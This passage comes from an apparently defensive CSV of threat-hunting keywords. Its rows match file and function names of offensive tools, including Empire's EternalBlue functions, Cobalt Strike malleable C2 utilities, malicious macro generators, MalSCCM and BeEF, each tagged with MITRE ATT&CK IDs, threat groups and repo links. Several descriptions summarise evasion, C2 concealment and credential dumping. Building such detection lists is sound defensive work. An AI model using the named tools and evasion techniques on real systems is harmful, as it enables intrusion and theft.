- T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_free_hole_session_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_nt_trans_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_trans2_explo*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb2_payload_body_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb2_payload_headers_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*makebof.bat*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" +"*MakeHTTPSmugglerJAR.launch*","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","668","108","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" +"*malicious.csproj*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1395","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" +"*malicious.dll*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*MaliciousMacroGenerator*","offensive_tool_keyword","MaliciousMacroGenerator","Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape mechanism.","T1027 - T1564 - T1127 - T1059 - T1562","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator","1","0","N/A","N/A","9","808","210","2019-04-17T19:47:38Z","2016-09-21T23:18:14Z" +"*MaliciousMacroMSBuild-master*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","1","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" +"*Malleable C2 Files*","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","149","40","2021-03-29T07:00:00Z","2019-02-22T09:36:44Z" +"*Malleable PE/Stage*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*malleable_redirector.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*malleable_redirector_hidden_api_endpoint*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*Malleable-C2-Profiles*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Malleable-C2-Randomizer*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*Malleable-C2-Randomizer*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*malleable-c2-randomizer.py*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" +"*MalleableProfileB64*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*MalleableProfiles.vue*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" +"*malleable-redirector-config*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*MalSCCM.exe*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*MalSCCM-main*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*malware.NewConfig*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*malwaredllc*","offensive_tool_keyword","byob","BYOB is an open-source post-exploitation framework for students. Pre-built C2 server Custom payload generator 12 post-exploitation modules It is designed to allow students and developers to easily implement their own code and add cool new features without having to write a C2 server or Remote Administration Tool from scratch","T1024 - T1059 - T1064 - T1002 - T1071","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/malwaredllc/byob","1","0","N/A","N/A","10","8506","2072","2023-10-02T14:55:32Z","2017-12-18T09:10:12Z" +"*man_in_the_browser.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*man_spider.manspider:main*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*ManagedEasyHook.dll*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*manageengine_adselfservice_plus_cve_2022_28810.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*manageengine_xnode/CVE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and 